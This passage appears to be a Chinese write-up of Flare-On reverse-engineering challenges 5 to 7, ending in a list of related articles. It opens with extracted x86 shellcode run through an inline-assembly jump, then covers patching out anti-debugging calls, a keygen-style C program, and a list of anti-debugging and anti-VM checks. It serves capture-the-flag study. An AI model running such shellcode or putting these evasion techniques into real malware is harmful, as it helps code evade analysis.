0x00, 0xD5, 0x7A, 0x03, 0xF8, 0xE2, 0x24, 0xB0, 0x4E, 0xFD, 0x79, 0x3D, 0x96, 0x75, 0x15, 0x9B,
0x49, 0x7C, 0x2F, 0xB4, 0x4F, 0x9F, 0x99, 0x47, 0x3B, 0xC1, 0xD0, 0xE3, 0x14, 0x40, 0x3F, 0x90,
0xBF, 0x41, 0x97, 0x43, 0x8D, 0xB8, 0x48, 0xB5, 0x77, 0x0D, 0xB2, 0x4A, 0x93, 0x2D, 0x67, 0x92,
0x98, 0xB1, 0x1A, 0xFC, 0xB9, 0xD4, 0x2C, 0xB3, 0xF5, 0xBA, 0x0C, 0x69, 0xD6, 0x91, 0xA8, 0x04,
0xBB, 0x1D, 0x66, 0x46, 0x05, 0x25, 0xB7, 0x35, 0x42, 0x37, 0x27, 0x4B, 0x90, 0xFC, 0x33, 0xD2,
0xB2, 0x30, 0x64, 0xFF, 0x32, 0x5A, 0x8B, 0x52, 0x0C, 0x8B, 0x52, 0x14, 0x8B, 0x72, 0x28, 0x33,
0xC9, 0xB1, 0x18, 0x33, 0xFF, 0x33, 0xC0, 0xAC, 0x3C, 0x61, 0x7C, 0x02, 0x2C, 0x20, 0xC1, 0xCF,
0x0D, 0x03, 0xF8, 0xE2, 0xF0, 0x81, 0xFF, 0x5B, 0xBC, 0x4A, 0x6A, 0x8B, 0x5A, 0x10, 0x8B, 0x12,
0x75, 0xDA, 0x8B, 0x53, 0x3C, 0x03, 0xD3, 0xFF, 0x72, 0x34, 0x8B, 0x52, 0x78, 0x03, 0xD3, 0x8B,
0x72, 0x20, 0x03, 0xF3, 0x33, 0xC9, 0x41, 0xAD, 0x03, 0xC3, 0x81, 0x38, 0x47, 0x65, 0x74, 0x50,
0x75, 0xF4, 0x81, 0x78, 0x04, 0x72, 0x6F, 0x63, 0x41, 0x75, 0xEB, 0x81, 0x78, 0x08, 0x64, 0x64,
0x72, 0x65, 0x75, 0xE2, 0x49, 0x8B, 0x72, 0x24, 0x03, 0xF3, 0x66, 0x8B, 0x0C, 0x4E, 0x8B, 0x72,
0x1C, 0x03, 0xF3, 0x8B, 0x14, 0x8E, 0x03, 0xD3, 0x52, 0x33, 0xFF, 0x57, 0x68, 0x61, 0x72, 0x79,
0x41, 0x68, 0x4C, 0x69, 0x62, 0x72, 0x68, 0x4C, 0x6F, 0x61, 0x64, 0x54, 0x53, 0xFF, 0xD2, 0x68,
0x33, 0x32, 0x01, 0x01, 0x66, 0x89, 0x7C, 0x24, 0x02, 0x68, 0x75, 0x73, 0x65, 0x72, 0x54, 0xFF,
0xD0, 0x68, 0x6F, 0x78, 0x41, 0x01, 0x8B, 0xDF, 0x88, 0x5C, 0x24, 0x03, 0x68, 0x61, 0x67, 0x65,
0x42, 0x68, 0x4D, 0x65, 0x73, 0x73, 0x54, 0x50, 0xFF, 0x54, 0x24, 0x2C, 0x57, 0x68, 0x44, 0x21,
0x21, 0x21, 0x68, 0x4F, 0x57, 0x4E, 0x45, 0x8B, 0xDC, 0xE8, 0x00, 0x00, 0x00, 0x00, 0x8B, 0x14,
0x24, 0x81, 0x72, 0x0B, 0x16, 0xA3, 0xFB, 0x32, 0x68, 0x79, 0xCE, 0xBE, 0x32, 0x81, 0x72, 0x17,
0xAE, 0x45, 0xCF, 0x48, 0x68, 0xC1, 0x2B, 0xE1, 0x2B, 0x81, 0x72, 0x23, 0x10, 0x36, 0x9F, 0xD2,
0x68, 0x71, 0x44, 0xFA, 0xFF, 0x81, 0x72, 0x2F, 0xF7, 0xA9, 0xA9, 0x0C, 0x68, 0x84, 0xE9, 0xCF,
0x60, 0x81, 0x72, 0x3B, 0xBE, 0x93, 0xA9, 0x43, 0x68, 0xD2, 0xA3, 0x98, 0x37, 0x81, 0x72, 0x47,
0x82, 0x8A, 0x62, 0x3B, 0x68, 0xEF, 0xA4, 0x11, 0x4B, 0x81, 0x72, 0x53, 0xD6, 0x47, 0xC0, 0xCC,
0x68, 0xBE, 0x69, 0xA4, 0xFF, 0x81, 0x72, 0x5F, 0xA3, 0xCA, 0x54, 0x31, 0x68, 0xD4, 0xAB, 0x65,
0x52, 0x8B, 0xCC, 0x57, 0x53, 0x51, 0x57, 0x8B, 0xF1, 0x89, 0xF7, 0x83, 0xC7, 0x1E, 0x39, 0xFE,
0x7D, 0x0B, 0x81, 0x36, 0x42, 0x45, 0x45, 0x46, 0x83, 0xC6, 0x04, 0xEB, 0xF1, 0xFF, 0xD0, 0x68,
0x65, 0x73, 0x73, 0x01, 0x8B, 0xDF, 0x88, 0x5C, 0x24, 0x03, 0x68, 0x50, 0x72, 0x6F, 0x63, 0x68,
0x45, 0x78, 0x69, 0x74, 0x54, 0xFF, 0x74, 0x24, 0x40, 0xFF, 0x54, 0x24, 0x40, 0x57, 0xFF, 0xD0
};
int main(int argc, const char **argv, const char **envp)
{
printf("11111111111111111111111");
__asm
{
lea eax, shellcode;
jmp eax;
}
return 0;
}
第五題
這道題真是白了少年頭啊...
最終是透過flare, com這兩個關鍵片語推理出 _cfltcvt_init
函式內各個變數之間的關係...
實際上稍微注意下函式 _cfltcvt_init
內各個變數的使用情況就可以發現, 除了初始化各個變數時都賦值一次外, 每個變數都有兩次賦值(先賦值為1, 後賦值為0)和一次與0比較. 每當變數值大於0時, 馬上賦值為0, 並且給另外一個變數賦值1, 因此推斷這個變數應該首先賦值1, 然後與0比較, 如果大於0則讓你等於0, 然後讓另外一個變數值為1, 因此可猜測這些變數的賦值操作是有順序的, 每一次賦值都是設定標誌位, 標誌著上一道手續已經完成, 該進行下一道手續了, 而唯一要做的手續就是構造字串. 因此, 只要按照各個變數的賦值順序順藤摸瓜即可.
按照這個理論去推算 flare, com, 發現完全符合, 並且推算出中間的破折號是 dash, on 字母還是 on, 英文句點是 dot, 剩下的就是從 _cfltcvt_init
函式內第一個變數開始推理了, 最終結果:
l0ggingdoturdot5tr0ke5atflaredashondotcom
去掉 dot, at, dash, 得到:
[email protected]
PS: 沒有找到一個簡單的方法讓這個程式自己輸出郵箱地址...
第六題
各種坑, 各種混淆, 還有反除錯, 把我這個菜鳥快坑死了...
剛開始時完全不知道如何入手, 於是自己寫 Hello World 測試, 確定 main
函式位置...
後來得到大牛指導, 根據程式輸出內容確定 printf
函式位置並標記它, 而且這個程式也是與引數有關的.
OK, 得到大牛指點後就標記了 printf
函式, 並且測試了當引數不同時程式的輸出有什麼不同, 測試發現:
- 一個引數: 輸出 no;
- 兩個引數: 輸出 bad;
- 三個或三個以上引數: 輸出 stahp
根據以上資訊可推測程式應該只接受兩個引數, 後面的分析也證明是這樣~
另外, 在使用 strace
命令檢視程式的系統呼叫時也可以發現, 只要引數個數不是兩個的時候, 程式行為與是否被 strace
監控無關, 一旦程式有兩個引數時, 這個程式就有個反除錯判定:
#!bash
[email protected]:~/Desktop/6# strace -i ./e7bc5d2c0cf4480348f5504196561297 1 1
[ 7fc5b45bba87] execve("./e7bc5d2c0cf4480348f5504196561297", ["./e7bc5d2c0cf4480348f55041965612"..., "1", "1"], [/* 30 vars */]) = 0
[ 4a9297] uname({sys="Linux", node="kali", ...}) = 0
[ 4aa78a] brk(0) = 0x1441000
[ 4aa78a] brk(0x14421c0) = 0x14421c0
[ 45e3f5] arch_prctl(ARCH_SET_FS, 0x1441880) = 0
[ 4aa78a] brk(0x14631c0) = 0x14631c0
[ 4aa78a] brk(0x1464000) = 0x1464000
[ 47431b] ptrace(PTRACE_TRACEME, 0, 0x1, 0) = -1 EPERM (Operation not permitted)
[ 473e44] fstat(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(136, 6), ...}) = 0
[ 47509a] mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f04f4220000
[ 473f50] write(1, "Program received signal SIGSEGV,"..., 52Program received signal SIGSEGV, Segmentation fault
) = 52
[ 473dd8] exit_group(9001) = ?
OK, 根據提示資訊, 找到地址為 47431b 的位置, 發現這是一個值為 65h
的系統呼叫, 檢視GNU/linux系統呼叫列表 發現它是 __NR_ioperm: //101設定埠I/O許可權
, 不知道為什麼在此處卻變成了 __NR_ptrace: // 26程式跟蹤
呼叫了, 請求大牛指點~
上面這個地方就是反除錯的地方了, 直接將呼叫這個函式的地方修改 NOP
, 也就是 42F211 處的 E8 9A 50 05 00
五個位元組全改為 90
即可.
然後就可以用 kali 自帶的 edb 除錯了(相比 gdb, 這貨沒有 backtrace
這樣牛逼的命令啊).
透過 bad 字串可以確定第一個引數長度為 10 個位元組, 而且每個位元組與 56h 異或後等於字串 bngcg`debd, 因此可以反推出第一個引數是 4815162342. 下面這段程式碼是異或第一個引數的:
#!bash
.text:0000000000437149 loc_437149: ; CODE XREF: sub_435E20+139Fj
.text:0000000000437149 mov eax, [rbp+var_C4]
.text:000000000043714F cdqe
.text:0000000000437151 add rax, [rbp+var_230]
.text:0000000000437158 mov edx, [rbp+var_C4]
.text:000000000043715E movsxd rdx, edx
.text:0000000000437161 add rdx, [rbp+var_230]
.text:0000000000437168 movzx edx, byte ptr [rdx]
.text:000000000043716B xor edx, 56h
.text:000000000043716E mov [rax], dl
.text:0000000000437170 add [rbp+var_C4], 1
看看第一個引數檢測透過後程式做了什麼:
#!bash
[email protected]:~/Desktop/6# strace -i ./test 4815162342 a
[ 7ff6ad0f4a87] execve("./test", ["./test", "4815162342", "a"], [/* 31 vars */]) = 0
[ 4a9297] uname({sys="Linux", node="kali", ...}) = 0
[ 4aa78a] brk(0) = 0x10c9000
[ 4aa78a] brk(0x10ca1c0) = 0x10ca1c0
[ 45e3f5] arch_prctl(ARCH_SET_FS, 0x10c9880) = 0
[ 4aa78a] brk(0x10eb1c0) = 0x10eb1c0
[ 4aa78a] brk(0x10ec000) = 0x10ec000
[ 47c9c0] rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0
[ 47c882] rt_sigaction(SIGCHLD, NULL, {SIG_DFL, [], 0}, 8) = 0
[ 47c9c0] rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
[ 473d50] nanosleep({3600, 0},
程式卡住了, sleep
3600秒, 檢視下有兩處呼叫這個函式, 分別設定斷點, 最終確認是 473C67 處呼叫的, 將其設定為空指令~
再使用 strace
跟蹤程式, 什麼都發現不了了...
#!bash
[email protected]:~/Desktop/6# strace ./test 4815162342 a
[ 7fbf6cd9ea87] execve("./test", ["./test", "4815162342", "a"], [/* 30 vars */]) = 0
[ 4a9297] uname({sys="Linux", node="kali", ...}) = 0
[ 4aa78a] brk(0) = 0x103c000
[ 4aa78a] brk(0x103d1c0) = 0x103d1c0
[ 45e3f5] arch_prctl(ARCH_SET_FS, 0x103c880) = 0
[ 4aa78a] brk(0x105e1c0) = 0x105e1c0
[ 4aa78a] brk(0x105f000) = 0x105f000
[ 47c9c0] rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0
[ 47c882] rt_sigaction(SIGCHLD, NULL, {SIG_DFL, [], 0}, 8) = 0
[ 47c9c0] rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
[ 47c9c0] rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0
[ 47c882] rt_sigaction(SIGCHLD, NULL, {SIG_DFL, [], 0}, 8) = 0
[ 47c9c0] rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
[ 47c9c0] rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0
[ 47c882] rt_sigaction(SIGCHLD, NULL, {SIG_DFL, [], 0}, 8) = 0
[ 47c9c0] rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
[ 47c9c0] rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0
[ 47c882] rt_sigaction(SIGCHLD, NULL, {SIG_DFL, [], 0}, 8) = 0
[ 47c9c0] rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
[ 47c9c0] rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0
[ 47c882] rt_sigaction(SIGCHLD, NULL, {SIG_DFL, [], 0}, 8) = 0
[ 47c9c0] rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
[ 7fffc3975aec] _exit(140736474871580) = ?
此時, 我忘記之前是如何發現處理第二個引數的地方了...仔細想想, 當時應該是花費了大量時間篩選程式結構, 利用類似二分法的方式排除了大量無用函式後才剛好碰到了處理第二個引數的地方了.
現在重新來過肯定不能用這個笨方法了, 之前大牛提到過給引數下訪問斷點的事情, 好吧, 給第二個引數下訪問斷點吧. 此時就不能用 edb 除錯了, 只能祭出神器 gdb 了, 在 main
下斷點, 確定第二個引數的記憶體地址, 然後使用 watch
命令給該地址下訪問斷點, 執行程式, 當程式停下來時檢視函式呼叫桟:
#!bash
(gdb) bt
#0 0x00007fffffffd15f in ?? ()
#1 0x00007fffffffd148 in ?? ()
#2 0x000000000044bb2d in ?? ()
#3 0x000000000044c8f1 in ?? ()
#4 0x000000000044eabc in ?? ()
#5 0x000000000045bf71 in ?? ()
#6 0x000000000045dd01 in ?? ()
#7 0x000000000045dea4 in ?? ()
#8 0x0000000000401081 in ?? ()
#9 0x00007fffffffe438 in ?? ()
#10 0x0000000000000000 in ?? ()
此時執行反彙編命令 disassemble
失敗:
#!bash
(gdb) disassemble
No function contains program counter for selected frame.
那就還是在 edb 中除錯吧~~~
切換到 edb,檢視 0x44bb2d 處彙編程式碼, 在 0x44bb2b 處下斷點, 然後跟進函式呼叫即可看到第二個引數的驗證過程:
#!bash
.text:000000000044BB13 lea rdx, [rbp+var_440]
.text:000000000044BB1A mov rax, [rbp+var_450]
.text:000000000044BB21 add rax, 10h
.text:000000000044BB25 mov rax, [rax]
.text:000000000044BB28 mov rdi, rax
.text:000000000044BB2B call rdx
.text:000000000044BB2D
.text:000000000044BB2D loc_44BB2D: ; CODE XREF: sub_44B942+AEj
.text:000000000044BB2D mov [rbp+var_2B], 44h
.text:000000000044BB31 mov [rbp+var_25], 44h
.text:000000000044BB35 cmp [rbp+var_25], 44h
.text:000000000044BB39 jz short loc_44BB6C
最終得出第二個引數是 [email protected].
因此, 該程式的兩個引數分別是 4815162342 [email protected]
附錄:
gdb中檢視字串:
#!bash
p "%s", *(char*)[email protected]
生成第二個引數的C語言程式碼(程式中驗證過程的逆運算):
注: 每個函式可生成/輸出一個字母, 函式名是測試時各個跳轉的記憶體地址, 僅供參考.
#!c
#include <stdio.h>
unsigned char CROL(unsigned char c, int bits)
{
if (bits > 8)
bits = bits % 8;
return (c << bits) | (c >> (8 - bits));
}
unsigned char CROR(unsigned char c, int bits)
{
if (bits > 8)
bits = bits % 8;
return (c >> bits) | (c << (8 - bits));
}
unsigned char c = 0;
void e87c()
{
c = 27;
c = CROL(c, 0xf2);
printf("%c", c);
}
void e886()
{
c = 48;
c = c ^ 0xb3;
c = c ^ 0xf2;
c = c ^ 64;
printf("%c", c);
}
void e89a()
{
c = 31;
c = c ^ 113;
printf("%c", c);
}
void e8a8()
{
c = 0xb0;
c = CROL(c, 0xbc);
c -= 0xa3;
printf("%c", c);
}
void e8b9()
{
c = 0xe8;
c += 121;
printf("%c", c);
}
void e8c7()
{
c = 0xf6;
c += 40;
c = CROL(c, 0x82);
printf("%c", c);
}
void e8d8()
{
c = 31;
c -= 44;
c = CROL(c, 77);
c += 0xb0;
printf("%c", c);
}
void e8ec()
{
c = 0xaf;
c -= 63;
c = CROL(c, 42);
c = c ^ 0xb8;
c = CROR(c, 0x99);
c -= 84;
printf("%c", c);
}
void e906()
{
c = 93;
c = CROL(c, 0xba);
printf("%c", c);
}
void e914()
{
c = 41;
c -= 48;
c = CROL(c, 108);
c = c ^ 0xed;
printf("%c", c);
}
void e928()
{
c = 0xb5;
c += 0xbf;
printf("%c", c);
}
void e936()
{
c = 0xa5;
c -= 99;
c += 49;
c = CROR(c, 123);
c -= 0x8c;
c = CROR(c, 0xbc);
printf("%c", c);
}
void e950()
{
c = 0xf3;
c = CROR(c, 0x98);
c = c ^ 0xae;
c = CROR(c, 22);
c = CROR(c, 32);
printf("%c", c);
}
void e967()
{
c = 0xa6;
c -= 0xd2;
c = CROL(c, 110);
printf("%c", c);
}
void e978()
{
c = 98;
c -= 52;
printf("%c", c);
}
void e986()
{
c = 50;
c = c ^ 0xb2;
c -= 98;
c += 16;
c -= 0xcd;
printf("%c", c);
}
void e99d()
{
c = 0xeb;
c = CROL(c, 7);
c = c ^ 115;
c = c ^ 0xb7;
printf("%c", c);
}
void e9b1()
{
c = 11;
c += 76;
c -= 91;
c = CROL(c, 54);
c += 97;
c -= 52;
printf("%c", c);
}
void e9cb()
{
c = 0x9a;
c -= 90;
printf("%c", c);
}
void e9d9()
{
c = 0x99;
c = CROL(c, 0xa2);
printf("%c", c);
}
void e9e7()
{
c = 43;
c += 0xe7;
c = c ^ 126;
printf("%c", c);
}
void e9f8()
{
c = 0xaf;
c = CROR(c, 87);
c = CROL(c, 74);
c -= 78;
c = c ^ 0x86;
c += 0xb8;
printf("%c", c);
}
void ea12()
{
c = 0xc3;
c = c ^ 0xad;
c = c ^ 74;
c = CROR(c, 0x95);
c = c ^ 0xe8;
c = CROL(c, 0x86);
printf("%c", c);
}
void ea2c()
{
c = 3;
c -= 28;
c = c ^ 0xcc;
c = CROL(c, 69);
printf("%c", c);
}
void a40()
{
c = 0xe3;
c += 74;
printf("%c", c);
}
void a4e()
{
c = 0xca;
c = CROL(c, 0x90);
c = c ^ 0xa5;
printf("%c", c);
}
// n
void a5f()
{
c = 62;
c += 0xd8;
c = c ^ 120;
c = CROR(c, 54);
c = CROL(c, 0xde);
printf("%c", c);
}
// .
void a76()
{
unsigned char c = 0xd8;
c = CROR(c, 17);
c = CROR(c, 0xa2);
c = CROL(c, 0x89);
c += 0xad;
c -= 0xb5;
printf("%c", c);
}
// c
void a90()
{
unsigned char c = 0x82;
c = CROL(c, 0xc0);
c += 33;
c -= 64;
printf("%c", c);
}
// o
void aa4()
{
char c = 123;
c = CROR(c, 0xe3);
printf("%c", c);
}
// m
void ab2()
{
char c = 0xd7;
c = CROL(c, 0xf6);
c += 120;
printf("%c", c);
}
int main()
{
e87c();
e886();
e89a();
e8a8();
e8b9();
e8c7();
e8d8();
e8ec();
e906();
e914();
e928();
e936();
e950();
e967();
e978();
e986();
e99d();
e9b1();
e9cb();
e9d9();
e9e7();
e9f8();
ea12();
ea2c();
a40();
a4e();
a5f();
a76();
a90();
aa4();
ab2();
return 0;
}
第七題
這個程式使用了大量反除錯/反虛擬機器/根據時間定期觸發行為的特性, 並且每透過一個檢測點後就會對程式異或解密一次, 如果所有的檢測點都透過後, 會生成一個 dotNet 程式, 然後再破解這個 dotNet 程式, 找出郵箱地址.
這個程式在第一個函式 call test.00401030
使用 IsDebuggerPresent
函式檢測是否被除錯, 如果程式被除錯這個函式返回非零值, 否則返回值為0.
第二個函式 call test.004010C0
檢查 PEB(Process Environment Block) 的 BeingDebugged 標誌, 如果值為 1 則表示該程式被除錯. 其偏移位置為 FS:[0x32]
. (FS:0
指向 TEB(Thread Environment Block), FS:[0x30]
指向 PEB, 而 BeingDebugger 在 PEB 偏移 2h 處).
第三個函式 call test.00401130
透過 sidt
指令獲取中斷描述符表 IDT(Interrupt Descriptor Table) 的地址, 如果 IDT 地址為 0xFFxxxxxx, 則認為程式執行在虛擬機器中, 拒絕解密程式碼. 在 VMware 的虛擬機器上 IDT 位於地址 0xFFxxxxxx, 而真實機地址為 0x80xxxxxx. 不過比較幸運的是由於VMware更新, 這個檢測點已經失效了, 所以此函式不需要修改了.
第四個函式 call test.004011D0
透過執行特權指令 in
來檢測虛擬機器, 此處使用功能號 0A 獲取VMware, 檢測其返回值是否為 VMXH.
第五個函式 call test.004012A0
連續呼叫 SetLastError
, OutputDebugStringW
和 GetLastError
函式, 如果程式被除錯, 則 OutputDebugStringW
呼叫成功, GetLastError
返回值仍舊是剛剛透過 SetLastError
設定的值.
第六個函式 call test.00401350
檢測從地址區間 test.00401030~test.00401780 內指令操作碼 0xCC
數目是否等於 0x55, 如果不等, 則認為程式被除錯.
第七個函式 call test.004013F0
檢測 PEB 偏移 68h 處的 NtGlobalFlag 標誌, 當程式被除錯時, 該值等於 70h.
第八個函式 call test.00401460
檢測當前日期是否為任意一個月的 5 號, 如果是 5 號的話就解密程式...
然後是獲取當前程式檔案的路徑以及引數的起始地址, 存放在 eax 中. 此處要將 eax 指向的字串修改為 backdoge.exe, 後面函式會使用到這個檢測點.
第九個函式 call test.004014F0
檢查 eax 指向的字串是否等於 backdoge.exe, 如果是則解密程式....
第十個函式 call test.00401590
有兩個檢測點, 但是, 如果檢測條件為真的話會 混淆(不是解密哦) 程式碼, 所以一定要確保檢測點為假. 不過一般情況下本函式不需要修改. 因為目前大多還在使用 IPv4, 並且不會將 www.dogecoin.com 重定向到 127.0.0.1(這個檢測點有點怪, 誰會將這個域名重定向到127.0.0.1呢???).
第十一個函式 call test.004016F0
又是檢測時間的. 如果當前時間點為 17點 的話, 則透過檢測, 解密程式碼.
#!bash
00401B13 > \E8 18F5FFFF call test.00401030
00401B18 . E8 A3F5FFFF call test.004010C0
00401B1D . E8 0EF6FFFF call test.00401130
00401B22 . E8 A9F6FFFF call test.004011D0
00401B27 . E8 74F7FFFF call test.004012A0
00401B2C . E8 1FF8FFFF call test.00401350
00401B31 . E8 BAF8FFFF call test.004013F0
00401B36 . E8 25F9FFFF call test.00401460
00401B3B . 8B06 mov eax, dword ptr ds:[esi]
00401B3D . E8 AEF9FFFF call test.004014F0
00401B42 . E8 49FAFFFF call test.00401590
00401B47 . E8 A4FBFFFF call test.004016F0
後面這段程式碼是解密程式碼的, 不用管.
#!bash
00401B4C |. 8B1D 38945100 mov ebx, dword ptr ds:[test.519438]
00401B52 |. 8B3E mov edi, dword ptr ds:[esi]
00401B54 |. 33C9 xor ecx, ecx
00401B56 |. 85DB test ebx, ebx
00401B58 |. 74 29 jz short test.00401B83
00401B5A |. 8D9B 00000000 lea ebx, [ebx]
00401B60 |> B8 ABAAAAAA /mov eax, AAAAAAAB
00401B65 |. F7E1 |mul ecx
00401B67 |. C1EA 03 |shr edx, 3
00401B6A |. 8D0452 |lea eax, [edx*2+edx]
00401B6D |. 03C0 |add eax, eax
00401B6F |. 03C0 |add eax, eax
00401B71 |. 8BD1 |mov edx, ecx
00401B73 |. 2BD0 |sub edx, eax
00401B75 |. 8A043A |mov al, byte ptr ds:[edi+edx]
00401B78 |. 3081 F8314100 |xor byte ptr ds:[ecx+test.4131F8], al
00401B7E |. 41 |inc ecx
00401B7F |. 3BCB |cmp ecx, ebx
00401B81 |.^ 72 DD \jb short test.00401B60
第十二個函式 call test.004017A0
. 這個函式與 第十個函式 檢測類似, 如果您沒有修改第十個檢測函式, 即您電腦使用了 IPv4, 則本函式也不需要修改.
第十三個函式 call test.004018A0
需要翻牆訪問 https://twitter.com/FireEye/status/484033515538116608, 讀取頁面內容, 將 Secluded Hi 後面的 7 個位元組(也就是 jackRAT)作為異或解密的金鑰解密程式. 你可以翻牆, 或者本地搭伺服器修改host~
#!bash
00401B83 |> \E8 18FCFFFF call test.004017A0
00401B88 |. E8 13FDFFFF call test.004018A0 ; [test.004018A0
至此, ***|||||||*之間的程式碼已被解密, 除了 MZ 和 PE 標誌字串以外, 這段記憶體已經是個標誌的PE檔案了. 下面這段程式碼就是取第一個引數設定 MZ 標誌位, 取第二個引數設定 PE 標誌位:
#!bash
00401B8D . 8B4E 04 mov ecx, dword ptr ds:[esi+0x4]
00401B90 . 0FB611 movzx edx, byte ptr ds:[ecx]
00401B93 . 8815 F8314100 mov byte ptr ds:[0x4131F8], dl
00401B99 . 8B46 04 mov eax, dword ptr ds:[esi+0x4]
00401B9C . 8A48 01 mov cl, byte ptr ds:[eax+0x1]
00401B9F . 880D F9314100 mov byte ptr ds:[0x4131F9], cl
00401BA5 . 8B56 08 mov edx, dword ptr ds:[esi+0x8]
00401BA8 . 8A02 mov al, byte ptr ds:[edx]
00401BAA . A2 78324100 mov byte ptr ds:[0x413278], al
00401BAF . 8B4E 08 mov ecx, dword ptr ds:[esi+0x8]
00401BB2 . 0FB651 01 movzx edx, byte ptr ds:[ecx+0x1]
因此, 這個程式的0兩個引數分別為 MZ 和 PE.
再後面就是將解密後的程式寫入檔案 gratz.exe 並執行了.
程式執行介面:
這是個 .Net 程式, 拖到 ILSpy 裡, 可以看到如下程式結構:
其中, lulz.decoder1
, lulz.decoder2
, lulz.decoder3
和 lulz.decoder4
都是將輸入字串的每個字元經過一系列轉換後生成解密後的字元. 解密後發現 lulz.datwork
裡面使用SMTP協議傳送郵件的幾個設定都是錯誤的, 其具體值為:
#!bash
To: [email protected]
Subject: [email protected]
From: [email protected]
SmtpClient: smtp.secureserver.net
另外還發現沒有使用 lulz.decoder4
. 後來在 From1.lulzors
裡面發現有呼叫 lulz.decoder4
, 剛好這個函式是介面初始化的函式:
#!c#
// Finisher.Form1
public void lulzors()
{
lulz lulz = new lulz();
Thread thread = new Thread(new ThreadStart(lulz.datwork));
thread.Start();
while (thread.IsAlive)
{
}
this.label2.Text = lulz.decoder4("\v\fP\u000e\u000fBA\u0006\rG\u0015I\u001a\u0001\u0016H\\\t\b\u0002\u0013/\b\t^\u001d\bJO\a]C\u001b\u0005");
}
這個 Form1.label2
應該就是程式介面下方空白的那一部分吧, 把呼叫 lulz.decoder4
這一行單獨拿出來執行, 其結果為:
[email protected]
這個就是最終正確的郵箱地址了.
當然也可以修改程式, 讓程式直接輸出郵箱地址:
參考連結:
- 【原創】虛擬機器檢測技術剖析
- 加密與解密(第三版)
- 利用pdf的js函式漏洞構造堆噴射的攻擊思路
- 找到shellcode
相關文章
- Flare-on5 Challenge6 magic -Writeup2018-09-20
- Flare-On 8th Challenge 9復現2022-04-02
- Flare-On 8th兩道題目復現(Challenge 5 & 7)2022-04-02
- python challenge 解題 第4關2021-01-02Python
- Motivation & Challenge2024-11-04
- 2018 Mossad Challenge2018-06-14
- type challenge(easy 部分)2023-05-16
- AMBF 之 surgical robotics challenge2024-08-13
- Nosql/Redis/ttserver/Flare/memcache比較2019-05-11SQLRedisTTSServer
- Flutter - 不得不說的 Flare 動畫2019-09-08Flutter動畫
- Flutter動畫之Flare的製作與使用2019-01-14Flutter動畫
- 在Flutter中使用Flare構建的動畫2018-12-07Flutter動畫
- JOS Lab2 Memory Management Part 3 & challenge2020-10-26
- Pixelmator Pro 3.5.10 Flare (macOS Universal) - 專業影像編輯工具2024-05-06Mac
- 開啟Flutter動畫的另一種姿勢——Flare2019-07-02Flutter動畫
- Becoder # 16288. 「BZOJ2288 POJ Challenge」生日禮物2024-12-08
- [譯] 如何在 Titanic Kaggle Challenge 中獲得0.8134分2019-02-13
- 論文翻譯:2020_Acoustic Echo Cancellation Challenge Datasets And Testingframework2020-09-19Framework
- Flutter(Flare) 最有趣使用者互動動畫沒有之一2020-07-04Flutter動畫
- Flare動畫進階——建立可互動的一拳超人動畫2019-07-04動畫
- List announced! 24 Tencent Light teams, see you in the finals of the Tencent Light Public Welfare Innovation Challenge!2022-11-24
- 題解2024-11-08
- 解題2024-04-29
- 每日"兩"題 題解2024-03-13
- Intel Code Challenge Final Round (Div. 1 + Div. 2, Combined) B. Batch Sort2020-04-06IntelBAT
- XYCTF pwn部分題解 (部分題目詳解)2024-04-29
- 無題號 分配問題 題解2024-06-09
- 火星商店問題 題解2024-10-07
- LeetCode題解第122題2020-11-09LeetCode
- 排列 題解2024-09-05
- 20240805題解2024-08-07
- Determinant 題解2024-08-15NaN
- 20240726題解2024-07-26
- 題解集合2024-06-09
- Minlexes題解2024-03-31
- 杯子題解2020-11-14
- OVO題解2020-12-22
- Kechuang People | Qingteng CEO Zhang Fu: Challenge the most difficult thing and pursue world-class cyber security products2021-08-31